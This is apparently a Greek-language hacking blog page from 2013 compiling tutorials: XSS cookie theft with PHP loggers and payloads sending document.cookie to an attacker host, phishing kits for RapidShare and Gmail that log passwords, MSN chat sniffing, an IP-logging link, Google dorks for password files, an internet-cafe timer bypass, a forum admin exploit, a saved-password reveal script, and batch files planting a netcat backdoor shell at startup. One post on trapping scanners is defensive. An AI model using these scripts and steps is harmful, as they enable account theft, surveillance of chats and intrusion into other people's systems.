Social Icons

.

Πέμπτη 15 Αυγούστου 2013

Πώς να κλέψουμε τα cookies χρησιμοποιώντας XSS

Ένας τρόπος για να μπορέσουμε να βρούμε τους κωδικούς χρηστών από κάποια ιστοσελίδα είναι μέσω Cross Site Scripting (XSS).Θα πρέπει φυσικά η ιστοσελίδα να είναι vulnerable σε αυτού τους είδους τις επιθέσεις.Για να βρούμε ποιές ιστοσελίδες παρουσιάζουν αυτού του είδους την αδυναμία αρκεί να χρησιμοποιήσουμε το πρόγραμμα Acunetix Vulnerability Scanner.
Ποιά εργαλεία θα χρειαστούμε?
Μόλις βρούμε τον στόχο μας τότε θα χρειαστούμε τα ακόλουθα:
  1. Έναν λογαριασμό σε ένα hosting site
  2. 2 σελίδες με κώδικα php
  3. Την ιστοσελίδα που είναι vulnerable
Μπορούμε να βρούμε αρκετά hosting sites που υποστηρίζουν php όπως:
www.000webhost.com
http://www.free-webhosts.com/free-php-webhosting.php
Δημιουργούμε λοιπόν έναν λογαριασμό σε κάποιο free hosting site για να ανεβάσουμε τις php σελίδες μας.Η μία σελίδα θα έχει το όνομα vb.php και θα περιέχει τον κώδικα:
<head>
<meta http-equiv=”Content-Language” content=”it”>
<title>Cookies Stealther</title>
</head>

<body bgcolor=”#C0C0C0″>
<p align=”center”><font color=”#FF0000″>COOKIES STEALTHER</font></p>
<p align=”center”><font face=”Arial” color=”#FF0000″>By R00T[ATI]</font></p>
<p align=”left”>&nbsp;</p>

</body>
και η άλλη σελίδα θα έχει το όνομα documents.php και θα περιέχει τον εξής κώδικα:
<?php
$ip = $_SERVER['REMOTE_ADDR'];
$referer = $_SERVER['HTTP_REFERER'];
$agent = $_SERVER['HTTP_USER_AGENT'];

$data = $_GET[c];
$time = date(“Y-m-d G:i:s A”);
$text = “<br><br>”.$time.” = “.$ip.”<br><br>User Agent: “.$agent.”<br>Referer:  “.$referer.”<br>Session: “.$data.”<br><br><br>”;

$file = fopen(‘vb.php’ , ‘a’);
fwrite($file,$text);
fclose($file);
header(“Location:
http://www.google.com“);
?>
Η σελίδα vb.php χρησιμοποιείται για να εμφανίσει σε εμάς τα cookies που έχει κλέψει και άλλες πληροφορίες ενώ η σελίδα documents.php χρησιμοποιείται για να πάρει πληροφορίες από τα πιθανά θύματα όπως η IP τους διεύθυνση κτλ.
Τώρα στην ιστοσελίδα που είναι vulnerable σε XSS θα πρέπει να εισάγουμε το ακόλουθο script:
http://vulnerable-site.com/vulnerable_page.php?vulnerable_method=<script>document.location=”http://www.example-of-hosting/documents.php?c=”+document.cookie;</script>
Τα μέλη που θα πέσουν θύματα αυτής της επίθεσης θα κατευθυνούν στο site της google (μπορούμε στο αρχείο documents.php να βάλουμε όποια άλλη σελίδα θέλουμε) και εμείς θα μπορούμε να δούμε τα cookies στο αρχείο vb.php

Βρίσκοντας ευάλωτες ιστοσελίδες με το Google

Παλαιότερα όταν κάποιος έψαχνε στην μηχανή αναζήτησης Google με συγκεκριμένα queries αυτήν στα αποτελέσματα της μπορούσε να εμφανίσει σημαντικές πληροφορίες όπως passwords από Admins,mail passwords κτλ.Τα τελευταία χρόνια όμως έχουν σταματήσει να εμφανίζεις οι περισσότερες ”καλές” πληροφορίες για λόγους ασφαλείας κυριώς επειδή γίναν γνωστά όλα αυτά τα queries στο ευρύ κοινό.
Ωστόσο υπάρχει ακόμα περίπτωση να βρούμε στα αποτελέσματα του Google κάποιους κωδικούς,username κτλ.Τα queries που θα πρέπει να δώσουμε στην αναζήτηση του Google για να βρούμε τα περιεχόμενα φακέλων όπως admin,password,mail κτλ. είναι τα ακόλουθα:
“index of /admin”
index of /password”
“index of /mail”
“index of /”+passwd
“index of /” password.txt
Επίσης μπορούμε να δοκιμάσουμε και να ψάξουμε για password hints προκειμένου να έχουμε κάποια παραπάνω στοιχεία για να σπάσουμε κάποιον κωδικό.Οι λέξεις κλειδιά είναι οι παρακάτω:
password hint
password hint -email
show password hint -email
filetype:htaccess user
Φυσικά όπως αναφέραμε και πιο πάνω είναι πλέον πολύ δύσκολο να εντοπίσουμε πάρα πολλά password αλλά έστω και για την μία φορά που θα βρούμε κάτι αξίζει η προσπάθεια.

Πώς βρίσκουμε το λειτουργικό σύστημα ενός υπολογιστή

Το να γνωρίζουμε το λειτουργικό σύστημα από κάποιο απομακρυσμένο μηχάνημα που θέλουμε να επιτεθούμε είναι ένα από τα βασικά στοιχεία και αυτό γιατί γνωρίζοντας το λειτουργικό που τρέχει μπορούμε να βρούμε πιο εύκολα και τις αδυναμίες του.
Ποιοί τρόποι υπάρχουν?
Υπάρχουνε αρκετοί τρόποι για να βρούμε το λειτουργικό σύστημα ενός μηχανήματος.Ο πιο απλός είναι μέσω banner-grabbing στον οποίο ουσιαστικά προσπαθούμε να συνδεθούμε σε κάποιες υπηρεσίες που τρέχει το μηχάνημα όπως FTP,Telnet,HTTP,SMTP κτλ. και από τις πληροφορίες που θα μας εμφανιστούν στην οθόνη μας ακόμα και αν δεν συνδεθούμε θα μπορέσουμε να καταλάβουμε αν τρέχει Windows,Linux κτλ.
Υπάρχει όμως και μία άλλη τεχνική για ανίχνευση του λειτουργικού συστήματος η οποία λέγεται Active Stack Fingerprinting.Η τεχνική αυτήν εστιάζει στο TCP/IP stack του κάθε λειτουργικού συστήματος το οποίο και διαφέρει από λειτουργικό σε λειτουργικό.Αλλιώς δηλαδή είναι το TCP/IP stack της Microsoft αλλιώς των MacOS και αλλιώς των Linux. 
Για να έχει αξιοπιστία η τεχνική αυτήν χρειάζεται να υπάρχει τουλάχιστον ένα ανοιχτό port στο απομακρυσμένο μηχάνημα.Διότι από τα services που τρέχουν και από τα ports που είναι ανοιχτά θα γίνει και ο εντοπισμός του λειτουργικού.
Από ποιά στοιχεία γίνεται η αναγνώριση του λειτουργικού?
Ουσιαστικά τα προγράμματα που είναι για ανίχνευση ενός λειτουργικού συστήματος καταλαβαίνουν το αν είναι Windows ή Linux ή MacOS από τις αποκρίσεις που πέρνουν όταν στέλουν διάφορα πακέτα.Πιο συγκεκριμένα εάν σταλεί ένα FIN πακέτο σε ένα ανοιχτό port και το λειτουργικό σύστημα αποκριθεί με ένα FIN/ACK τότε το πρόγραμμα που τρέχουμε για ανίχνευση καταλαβαίνει ότι πρόκειται για Windows λειτουργικό.Αναλύτικα η αναγνώριση ενός λειτουργικού γίνεται από τα εξής:
FIN
Bonus Flag
Initial Sequence Number (ISN)
Fragment bit
TCP Initial Window Size
ACK value
ICMP message quoting
ICMP error message quenching
ICMP error message – echoing integrity
TOS (Type of Service)
Fragmentation Handling
TCP Options
Ποιά εργαλεία θα χρειαστούμε?
Δύο είναι τα πιο ακριβή εργαλεία που μπορούν να εντοπίσουν το λειτουργικό σύστημα από ένα απομακρυσμένο host.Το ένα είναι το nmap και το άλλο είναι το queso.Το καλό με το nmap είναι ότι υποστηρίζεται από αρκετές πλατφόρμες (Windows,Linux,MacOS) σε αντίθεση με το queso που είναι μόνο για linux.Επίσης για όσους δεν γνωρίζουν τo nmap είναι ένα port scanner αλλά με δυνατότητα ανίχνευσης λειτουργικού συστήματος ενώ το queso είναι μόνο ένα εργαλείο για να εντοπίζει λειτουργικά συστήματα απομακρυσμένων host.
Που θα τα βρούμε?
Και τα δύο αυτά τα προγράμματα διατίθενται δωρεάν από τις ακόλουθες ιστοσελίδες.
Nmap:
http://nmap.org/download.html
Queso:
http://dir.filewatcher.com/d/OpenBSD/3.3/i386/queso-980922.tgz.15765.html
Πώς τα δουλεύουμε?
Η λειτουργία τους είναι αρκετά απλή.Το nmap στην τελευταία του έκδοση και για τους χρήστες Windows υποστηρίζει πλέον και GUI interface ενώ έχει και αρκετά καλό help file.Ωστόσο η εντολή σε περίπτωση που το τρέξουμε είτε από γραμμή εντολών είτε από Linux είναι η εξής:
nmap -O IP
ενώ για το queso πληκτρολογούμε το εξής:
[root] queso IP
Παράδειγμα:
Ανίχνευση του λειτουργικού από το nmap

Προστασία του site μας από scanner και bots

Αν διαθέτουμε κάποια ιστοσελίδα είναι πολύ πιθανόν ότι κάποια στιγμή κάποιος χρήστης μπορεί να χρησιμοποιήσει κάποιο scanner ή κάποιο bot προκειμένου να προσπαθήσει να ανακαλύψει τις αδυναμίες του site μας.
Το πρόβλημα
Πολλά κακόβουλα bots κρύβονται πίσω από ψεύτικα UA strings και αγνοούν εντελώς το αρχείο robots.txt.Οπότε ακόμα και αν έχουμε μπλοκάρει μερικά μέσω του αρχείου .htaccess κάποια είναι πιθανό να την παρακάμψουν αυτήν την προστασία χρησιμοποιώντας ονόματα από γνήσια user-agent. 
Επίσης ένα scanner ή ένα bot τραβάει από το bandwidth της ιστοσελίδας μας και αυτό μπορεί να έχει σαν επακόλουθο το site μας να αργεί να φορτώσει.
Δημιουργία της παγίδας
Το πρώτο πράγμα που θα πρέπει να κάνουμε είναι να ρυθμίσουμε την παγίδα.Θα δημιουργήσουμε λοιπόν έναν φάκελο με το όνομα trap μέσα στο root.Έτσι όταν ένα bot ή ένα scanner μπει σε αυτόν τον φάκελο η IP του θα γίνει αυτόματα ban.Επίσης αυτό θα συμβεί και για όλους τους χρήστες ή επισκέπτες της ιστοσελίδας που θα προσπαθήσουν να μπούνε σε αυτόν τον φάκελο.
Θα πρέπει επίσης να σιγουρευτούμε ότι δεν θα μπανάρουμε τα γνήσια bots όπως το Googlebot,Yahoobot κτλ.Μπορούμε να το αποφύγουμε αυτό το σενάριο απλά προσθέτοντας το παρακάτω στο αρχείο robots.txt:
User-agent: *
Disallow: /trap/
Τα περισσότερα bots θα υπακούσουν σε αυτήν την ρύθμιση και δεν θα μπούνε στον φάκελο trap. 
Το επόμενο βήμα είναι να δημιουργήσουμε το αρχείο index.php μέσα στον φάκελο με το όνομα trap και να προσθέσουμε το ακόλουθο:
<?php
$agent = $_SERVER['$HTTP_USER_AGENT'];
$datum = date(“Y-m-d (D) H:i:s”,$tmestamp);
$ipad = $_SERVER['REMOTE_ADDR'];
$ban = “Deny from $ipad # /trap/ $agent – on $datum \r\n”;
$file = “../.htaccess”;
$search = file_get_contents($file);
$check = strpos($search, $ipad);
if ($check === FALSE) {
$open = @fopen($file, “a+”);
$write = @fputs($open, $ban);
    echo “The IP <b>”.$ipad.”</b> has been blocked for an invalid access attempt to a file, directory, or a scanning atempt.;
@fclose($open);
} else {
    echo “The IP <b>”.$ipad.”</b> has been blocked for an invalid access attempt to a file, directory, or a scanning atempt.”;
}
exit;
?>

Σημείωση:
$ban—>Ότι θα γραφτεί στο αρχείο .htaccess.Οτιδήποτε μετά τo σύμβολο # είναι σχόλιο.Επίσης το αρχείο .htaccess θα πρέπει να έχει δικαιώματα 666.
$file—->Βάζουμε την διαδρομή που βρίσκεται η παγίδα μας
Ενεργοποίηση της παγίδας
Τώρα που το σύστημα είναι τοποθετημένο θα πρέπει να ρυθμίσουμε το δόλωμα για τα bots.Τοποθετούμε λοιπόν τον παρακάτω κώδικα μέσα στο αρχείο index στον φάκελο root.
<a href=”/trap/”><img src=”images/pix.JPG” border=”0″ alt=” ” width=”1″ height=”1″></a>
Όταν ένα scanner ή ένα bot μπεί στην αρχική σελίδα μας θα εντοπίσει το παραπάνω link και θα κατευθυνθεί προς αυτό όπου και θα γίνει ban η IP του.
Αποτέλεσμα:
Το αποτέλεσμα αυτής της παγίδας όταν κάποιο bot ή scanner εισέλθει στον φάκελο trap θα είναι το ακόλουθο:
Deny from ***.***.***.***,# /admin/ – on 2009-08-20 (Wed) 16:00:00

Πώς να κλέψουμε τα account μελών από ένα φόρουμ

Μία από τις πιο διαδεδομένες τεχνικές για να κλέψουμε τον λογαριασμό κάποιου χρήστη ή και πολλών χρηστών είναι να χρησιμοποιήσουμε την μέθοδο XSS (Cross Site Scripting).
Θα πρέπει καταρχάς να χρησιμοποιήσουμε κάποιο web vulnerability scanner όπως το Acunetix ή το Paros για να βρούμε τα ευάλωτα φόρουμ σε επιθέσεις XSS.Μόλις εντοπίσουμε τον στόχο μας ακολουθούμε την παρακάτω διαδικασία.
1)Δημιουργούμε ένα αρχείο με το όνομα cookie.php και εισάγουμε τον παρακάτω κώδικα:
<?php
$cookie = $_GET['c'
];
$ip = getenv (’REMOTE_ADDR’
);
$date=date(”j F, Y, g:i a”
);;
$referer=getenv (’HTTP_REFERER’
);
$fp = fopen(’cookies.html’, ‘a’
);
fwrite($fp, ‘Cookie: ‘.$cookie.’<br> IP: ‘ .$ip. ‘<br> Date and Time: ‘ .$date. ‘<br> Referer: ‘.$referer.’<br><br><br>’
);
fclose($fp
);
header (”Location: http://www.test.com
”);
?> 
 
Το αρχείο cookie.php το ανεβάζουμε σε κάποιο host site που έχουμε.Φυσικά στην προτελευταία σειρά τοποθετούμε την διεύθυνση του host μας αντί για test.com δηλαδή.
2)Δημιουργούμε ένα νέο thread στο ευάλωτο φόρουμ και πληκτρολογούμε το ακόλουθο:
<script>document.location=”http://www.myhost.com/cookie.php?c=” + document.cookies</script>
Φυσικά στο myhost.com βάζουμε το δικό μας host όπως είναι κατανοητό.
Τώρα όταν κάποιο μέλος του φόρουμ ανοίξει το thread τα cookies του θα σταλούν στο:
http://www.myhost.com/cookie.html
Οπότε έχοντας το cookie και σε συνδοιασμό με το πρόγραμμα Cain ή κάποιο άλλο cookie decoder θα μπορέσουμε να αποκρυπτογραφήσουμε το cookie για να βρούμε το password.

Υποκλέπτοντας τις συζητήσεις στο MSN σε ένα δίκτυο

Αν είμαστε σε κάποιο δίκτυο (δουλειά,πανεπιστήμιο,σχολείο κτλ) και θέλουμε να κατασκοπεύσουμε για κάποιον δικό μας λόγο τις συζητήσεις στο MSN των άλλων που βρίσκονται εκείνη την ώρα στο δίκτυο μπορούμε πολύ εύκολα και γρήγορα με την παρακάτω διαδικασία να το επιτύχουμε.
Τι θα χρειαστούμε?
Υπάρχουνε διάφορα εργαλεία και προγράμματα που μπορούμε να χρησιμοποιήσουμε για να το επιτύχουμε αυτό αλλά στην προκειμένη περίπτωση θα χρησιμοποιήσουμε το Net Tools και το MSN live plus με το IPGet.
Που θα τα βρούμε?
Το IPGet είναι ένα perl script το οποίο θα πρέπει να το ενσωματώσουμε στο MSN live plus και μπορούμε να το βρούμε στο παρακάτω σύνδεσμο.
http://rapidshare.com/files/29545130/MZN_-_HaCK_iPGET.rar
το MSN Plus live από:
http://www.msgpluslive.net/download/
και τα Net  Tools:
http://www.softpedia.com/progDownload/Net-Tools-Download-22193.html
Τι κάνουμε αφού τα κατεβάσουμε?
Εφόσον τα έχουμε κατεβάσει και τα έχουμε κάνει εγκατάσταση ενσωματώνουμε το IPGet στο MSN προκειμένου να μπορούμε να βρούμε τις IP των επαφών μας εύκολα και γρήγορα.
Στέλνουμε μία φωτογραφία στην επαφή που θέλουμε να δούμε τις συζητήσεις που θα κάνει.Το IPGet θα πάρει την IP της επαφής μας και θα την αποθηκεύσει.
Έχοντας την IP ανοίγουμε τα Net Tools και συγκεκριμένα το εργαλείο Messenger Packet Sniffer.Βάζουμε την IP και στο  C:\Program Files\Net Tools\MessengerSpyLog.txt (αν έχουμε κάνει εγκατάσταση τα Net Tools στο Program Files) θα περιέχονται όλες τις συζητήσεις που θα κάνει το θύμα μας από την στιγμή που θα αρχίσουμε το sniffing.

Η τεχνική του phishing

Μία τεχνική του χάκινγκ που χρησιμοποιείται για κλέψιμο κωδικών και λογαριασμών είναι το Phishing.Στο συγκεκριμένο άρθρο θα αναλύσουμε την τεχνική αυτήν μέσα από ένα παράδειγμα για να δούμε πως μπορούν οι χάκερς να μας ξεγελάσουν για να κλέψουν τα account μας.
Θα χρησιμοποιήσουμε την ιστοσελίδα rapidshare.com σαν παράδειγμα για το άρθρο μας.
Πηγαίνουμε λοιπόν στο site http://www.rapidshare.com και επιλέγουμε να πάμε στην σελίδα premium zone.Εκεί κάνουμε δεξί κλικ στην σελίδα και επιλέγουμε προβολή προέλευσης.Επιλέγουμε όλο των κώδικα και τον αντιγράφουμε σε ένα έγγραφο σημειωματαρίου.
Στον κώδικα μας ενδιαφέρουν δύο λέξεις:method και action.Ψάχνουμε με την εύρεση (ctrl+F) για να βρούμε που αναφέρεται η λέξη method.Θα δούμε ότι στο αποτέλεσμα θα μας εμφανίσει method=”post” και αλλάζουμε το post με την λέξη get.
Τώρα ψάχνουμε για την λέξη action μέσα στον κώδικα και θα δούμε κάτι σαν το παρακάτω:
 action=”https://ssl.rapidshare.com/cgi-bin/premiumzone.cgi
Αντικαθιστούμε τον παραπάνω σύνδεσμο με το next.php δηλαδή:
action=”next.php”
Σώζουμε αυτό το αρχείο σαν index.html και τώρα θα δημιουργήσουμε την σελίδα next.php.Δημιουργούμε ένα νέο έγγραφο σημειωματαρείου και πληκτρολογούμε τον παρακάτω κώδικα:
Κώδικας:
<?php
$datum = date(‘d-m-Y / H:i:s’);
$ip = $_SERVER['REMOTE_ADDR'];
header(“Location: Edw vazoume to redirect url mas”);
$handle = fopen(“password.txt”, “a”);
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “\r\n”);
}
fwrite($handle, “IP: $ip | Date: $datum (Date=0 GTM)\r\n”);
fwrite($handle, “\r\n”);
fclose($handle);

setcookie (“user”, “empty”, time()+3600);
exit;
?>

Η σελίδα next.php θα είναι και η σελίδα στην οποία θα κατευθυνθούν οι χρήστες αφότου βάλουν τις πληροφορίες λογαριασμού τους στην πρώτη σελίδα.
Στον παραπάνω κώδικα μετά από την λέξη location βάζουμε το redirect url μας το οποίο μπορεί να είναι η αυθεντική σελίδα του rapidshare ή οποιαδήποτε άλλη σελίδα επιθυμούμε εμείς να κατευθύνει τα θύματα μας αφότου βάλουν τις πληροφορίες του λογαριασμού τους.
Επιλέγουμε για το παράδειγμα μας την αυθεντική σελίδα του rapishare.Δηλαδή θα έχουμε:
header(“Location: https://ssl.rapidshare.com/cgi-bin/premiumzone.cgi&#8221;);
Σώζουμε αυτό το αρχείο σαν next.php και τώρα δημιουργούμε ένα ακόμα έγγραφο σημειωματαρείου με την ονομασία password.txt το οποίο και θα είναι το έγγραφο στο οποίο θα αποθηκεύονται οι πληροφορίες των λογαριασμών των θυμάτων.
Πηγαίνουμε σε ένα free web hosting site που υποστηρίζει php (όπως http://www.freeweb7.com/) και αφού σιγουρευτούμε ότι έχουμε διαγράψει όλα τα default αρχεία που υπάρχουν από τον web hosting provider όπως το index.html  ανεβάζουμε τα 3 αρχεία μας (index.html,next.php,password.txt).
Τώρα πηγαίνουμε στην ιστοσελίδα που έχουμε φτιάξει την ψεύτικη και βάζουμε test στο login και test στο password για να τσεκάρουμε αν θα εμφανιστούν στο password.txt.Αν εμφανιστούν τότε σημαίνει ότι η ψεύτικη μας σελίδα δουλεύει.
Με την παραπάνω μεθοδολογία θα δουλέψει ένας phisher για να κλέψει κωδικούς.Γι’αυτό μην βάζετε ποτέ τους κωδικούς σας σε ιστοσελίδες που δεν εμπιστεύεστε και πάντα να κοιτάτε το url για να δείτε αν είναι το αυθεντικό ή κάποιο που μοιάζει με το αληθινό domain και θέλει να μας παραπλανήσει.
Σημείωση:
Το παραπάνω παράδειγμα είναι απλώς για εκπαιδευτικούς σκόπους και δεν συνίσταται η χρήση του ενάντια σε άλλους χρήστες.Το datalibrary δεν φέρει ουδεμία ευθύνη σε περίπτωση που χρησιμοποιηθεί για κακόβουλους σκοπούς.

Πώς θα βρούμε την IP διεύθυνση από κάποιον χρήστη

Πολλοί χρήστες έχουν αναρωτηθεί για το πως μπορούν να βρουν την IP διεύθυνση από κάποιον που κάνουνε chat ή κάποιου φίλου τους.Η παρακάτω μέθοδος θα μας δώσει την δυνατότητα λοιπόν να βρούμε την IP οποιουδήποτε χρήστη. 
Αντιγράφουμε τον παρακάτω κώδικα σε ένα αρχείο σημειωματαρείου και το σώζουμε με το όνομα ip.php (μπορούμε όμως να δώσουμε και ότι όνομα θέλουμε) και αμέσως μετά δημιουργούμε ένα νέο αρχείο σημειωματαρείου με την ονομασία ip_log.Το αρχείο ip_log είναι και αυτό που θα κρατάει τις IP διευθύνσεις.
Κώδικας:
<?php
$ip = $_SERVER['REMOTE_ADDR'];
$dt = date(“l dS \of F Y h:i:s A”);
$file=fopen(“ip_log.txt”,”a”);
$data = $ip.’ ‘.$dt.”\n”;
fwrite($file, $data);
fclose($file);
header( ‘Location:
http://www.google.com’ ) ;
?>

Ανεβάζουμε τα δύο αυτά αρχεία σε κάποιο hosting που να υποστηρίζει php και δίνουμε δικαιώματα 777 στο αρχείο ip_log.txt.Τώρα το μόνο που έχουμε να κάνουμε είναι να δώσουμε το link που θα παραπέμπει στο αρχείο ip.php στο πρόσωπο που θέλουμε να μάθουμε την IP του.
Μόλις το ανοίξει η IP του θα καταγραφεί στο ip_log.txt μαζί με την ημερομηνία και την ώρα και θα κατευθυνθεί στο google.com αμέσως προκειμένου να μην υποπτευθεί τίποτα.

Πώς θα έχουμε απεριόριστο χρόνο στα Internet Cafe

Όλοι μας θα θέλαμε να πληρώνουμε λιγότερα όταν πάμε σε κάποιο Internet Cafe ιδιαίτερα αν δεν είμαστε μέλη του.Υπάρχει λοιπόν ένας τρόπος που σε κάποια Internet Cafe μπορεί να δουλέψει και να μην χρειαστεί να πληρώσουμε σχεδόν τίποτα για τις ώρες που θα καθίσουμε.Τι κάνουμε λοιπόν για να το επιτύχουμε αυτό?
Δημιουργούμε ένα αρχείο σημειωματαρείου και πληκτρολογούμε cmd.Σώζουμε το αρχείο με προέκταση .bat και δίνοντας κάποιο όνομα που θέλουμε.Έπειτα τρέχουμε το bat αρχείο και θα δούμε ότι θα ανοίξει η γραμμή εντολών.
Τώρα πληκτρολογούμε την εντολή cd/windows για να μετακινηθούμε στον φάκελο των Windows και γράφουμε regedit για να μπούμε στην registry.Στην registry ψάχνουμε να βρούμε τον παρακάτω φάκελο:
HKEY_CURRENT_USER>Appevents>software>classes>microsoft>      windows>     current version>  internet settings>policies>system
Στην δεξία πλευρά θα δούμε ένα κλειδί με την ονομασία Disable Task Manager.Με δεξί κλικ και επεξεργασία αλλάζουμε την τιμή σε αυτό το κλειδί από 1 σε 0.
Έπειτα ανοίγουμε την διαχείριση εργασιών με Ctrl+Alt+Del και απενεργοποιούμε το timer του Internet Cafe που είμαστε.

Χακάροντας τα Fubar φόρουμ

Μία τεράστια αδυναμία υπάρχει στις version 1.6 των Fubar forums την οποία αν την εκμεταλευτούμε μπορούμε να αποκτήσουμε δικαιώματα Admin.Ασφαλώς δεν υπάρχουν πάρα πολλά Fubar forums στο Internet αλλά με ένα κατάλληλο search μπορούμε να βρούμε ακόμα μερικά τα οποία δεν έχουν κλείσει την τρύπα.
Το πρώτο πράγμα που θα πρέπει να κάνουμε λοιπόν είναι να έχουμε το exploit το οποίο είναι το παρακάτω:
/forum/index.php?page=admin
Το επόμενο μας βήμα είναι να βρούμε κάποιο φόρουμ που να τρέχει την έκδοση 1.6 για να χρησιμοποιήσουμε το exploit.Ανοίγουμε λοιπόν το Google και ψάχνουμε για Fubar Forums βάζοντας στην εύρεση Powered by Fubar Forum v1.6.
Όπως θα δείτε από τα αποτελέσματα υπάρχουν αρκετά φόρουμς που έχουν ήδη γίνει deface από χάκερς καθώς πρόκειται για ένα πολύ απλό exploit που ο καθένας μπορεί να το χρησιμοποιήσει.Βρίσκουμε λοιπόν τον στόχο μας και στην μπάρα διευθύνσεων προσθέτουμε το /forum/index.php?page=admin
Δηλαδή το link μας θα πρέπει να είναι της μορφής www.xxxx.xxx/forum/index.php?page=admin μετά την προσθήκη του exploit.Πατάμε το enter και πλέον βλέπουμε ότι έχουμε δικαιώματα διαχειριστή και μπορούμε να δημιουργήσουμε και να διαγράψουμε φόρουμ και κατηγορίες.
Φυσικά όλα αυτά θα πρέπει να τα κάνουμε χρησιμοποιώντας κάποιον proxy server προκειμένου να προστατέψουμε την IP μας και την ανωνυμία μας.

Πώς θα σπάσουμε τα password πίσω από τα ****

Αν βρισκόμαστε σε κάποιον δημόσιο υπολογιστή (σχολείο,πανεπιστήμιο,δουλειά κτλ.) είναι πολύ πιθανό να βρούμε κάποιες ιστοσελίδες στις οποίες κάποιος χρήστης νωρίτερα να έχει κάνει login και ο browser να έχει κρατήσει τα στοιχεία του λογαριασμού του.Όμως ακόμα και αν γνωρίζουμε το όνομα του account πως θα δούμε τι κρύβεται πίσω από τα **** του κωδικού του?
Μέθοδος 1
Το μόνο που θα πρέπει να κάνουμε είναι να αντιγράψουμε τον παρακάτω κώδικα στην μπάρα διευθύνσεων του browser μας και ενώ βρισκόμαστε στην ιστοσελίδα με την login φόρμα και με το password σε μορφή ****
Κώδικας:
javascript: var p=r(); function r(){var g=0;var x=false;var x=z(document.forms);g=g+1;var w=window.frames;for(var k=0;k<w.length;k++) {var x = ((x) || (z(w[k].document.forms)));g=g+1;}if (!x) alert(‘Password not found in ‘ + g + ‘ forms’);}function z(f){var b=false;for(var i=0;i<f.length;i++) {var e=f[i].elements;for(var j=0;j<e.length;j++) {if (h(e[j])) {b=true}}}return b;}function h(ej){var s=”;if (ej.type==’password’){s=ej.value;if (s!=”){prompt(‘Password found ‘, s)}else{alert(‘Password is blank’)}return true;}}
Εικόνα:
Αποκάλυψη κωδικών πίσω από τα ****
Μέθοδος 2
Ένας άλλος τρόπος είναι να κατεβάσουμε το πρόγραμμα Asterisk Key και να το τρέξουμε.Όταν θα βρισκόμαστε στην ιστοσελίδα με το login και ενώ υπάρχει ήδη το password στην φόρμα με την μορφή **** πατάμε στο μενού Show Internet Explorer Passwords
Download: Asterisk Key
Μέθοδος 3
Χρησιμοποιώντας την εφαρμογή SC-PassUnleash.Η εφαρμογή αυτήν δουλεύει μόνο σε συγκεκριμένους FTP και Email Clients αλλά μπορεί να μας φανεί χρήσιμη σε περίπτωση που θέλουμε να βρούμε το email password κάποιου που είναι αποθηκευμένο σε κάποιο client π.χ Outlook.
Εικόνα 2:

Download: SC-PassUnleash
Υποσημείωση:
Το Javascript έχει ανεβεί σε μορφή .txt για να μην υπάρχει πρόβλημα με τον τρόπο που διαχειρίζεται τα “” η wordpress.

Βρίσκοντας κωδικούς Gmail με την μέθοδο Phishing

Μία από τις πιο αποδοτικές μεθόδους για να χακάρουμε κάποιον λογαριασμό είναι η μέθοδος του Phishing.Ο λόγος είναι ότι αν το θύμα μας πιστέψει ότι η σελίδα στην οποία θα βάλει τον κωδικό του είναι η αυθεντική τότε εμείς άμεσα θα έχουμε τον κωδικό του χωρίς να προσπαθούμε για μέρες να το σπάσουμε με άλλες μεθόδους.
Για να βρούμε λοιπόν κάποιον κωδικό του Gmail με την μέθοδο του phishing αρκεί να κάνουμε τα παρακάτω:
1)Κατεβάζουμε την ψεύτικη σελίδα του Gmail και κάνουμε εξαγωγή τα περιεχόμενα του σε έναν φάκελο
Ψεύτικη Gmail σελίδα:
2)Δημιουργούμε έναν free λογαριασμό σε κάποιο από τα παρακάτω site:
 www.t35.com
www.ripway.com
www.110mb.com
3)Ανεβάζουμε σε όποιο από τα παραπάνω site έχουμε κάνει λογαριασμό όλα τα αρχεία που έχουν γίνει εξαγωγή (βήμα 1).Για το παράδειγμα μας θα επιλέξουμε την ιστοσελίδα www.t35.com
4)Ανοίγουμε την ψεύτικη σελίδα του Gmail και βάζουμε κάποιο ψεύτικο username και password για να δούμε ότι όντως λειτουργεί.Η ψεύτικη σελίδα μας θα βρίσκεται στο παρακάτω link:
http://onomatousitesas.t35.com/Gmail.htm
5)Ένα αρχείο με τον κωδικό που έχει εισαχθεί θα δημιουργηθεί στον ίδιο φάκελο και θα μπορείτε να το δείτε στο παρακάτω link:
http://onomatousitesas.t35.com/GmailPasswords.htm
Πλέον είστε έτοιμοι να βρείτε κωδικούς λογαριασμών gmail αρκεί να διαμοιράσετε το ψεύτικο site που θα μοιάζει με το gmail έξυπνα ούτως ώστε να ψάρεψετε όσους περισσότερους λογαριασμούς μπορείτε.
Υποσημείωση:
Αυτό το άρθρο είναι για εκπαιδευτικούς σκοπούς και μόνο και η datalibrary δεν φέρει καμία ευθύνη για το πως θα χρησιμοποιήσετε τα αρχεία που θα κατεβάσετε.

Χάκινγκ σε υπολογιστή δικτύου

Όπως όλοι γνωρίζουμε ένα trojan είναι πολύ πιθανόν να ανακαλυφθεί από τα antivirus οπότε αυτό που θα χρειαστούμε στην συγκεκριμένη περίπτωση είναι το netcat.Το netcat είναι ένα πρόγραμμα το οποίο ανοίγει μία θύρα (port) σε κάποιον υπολογιστή για να μας δώσει πρόσβαση.
Θα πρέπει λοιπόν να γράψουμε ένα batch αρχείο το οποίο θα αντιγράφει το netcat στον απομακρυσμένο υπολογιστή.Για να γίνει αυτό θα πρέπει το batch αρχείο να εκτελεστεί με κάποιον τρόπο από τον υπολογιστή που θέλουμε να χακάρουμε.
Ανοίγουμε το σημειωματάρειο και πληκτρολογούμε το ακόλουθο:
@echo off
cd\
xcopy \\yourIP\shared folder\netcat.exe
copy \\yourIP\shared folder\netcat.exe
cd “Documents and Settings”
cd “All Users”
cd “Start Menu”
cd Programs
cd Startup
xcopy \\yourIP\shared folder\Startup.bat (Αυτό είναι ένα άλλο batch αρχείο που θα γράψουμε παρακάτω)
cd\
netcat.exe -L -p 9999 -d -e cmd.exe

Σώζουμε το αρχείο σαν .bat
Το επόμενο batch αρχείο θα χρησιμοποιηθεί για να σιγουρευτούμε ότι το port που καθορίσαμε θα ανοίγει κάθε φορά που θα κάνουν εκκίνηση τα windows.Μπορούμε φυσικά να βάλουμε όποιο port επιθυμούμε.Ανοίγουμε λοιπόν το σημειωματάρειο πάλι και γράφουμε το εξής:
@echo off
cd\
netcat.exe -L -p 9999 -d -e cmd.exe

Σώζουμε το αρχείο σαν .bat.Αυτό θα είναι το αρχείο που θα αντιγραφεί στον φάκελο startup από το προηγούμενο bat που είχαμε γράψει.
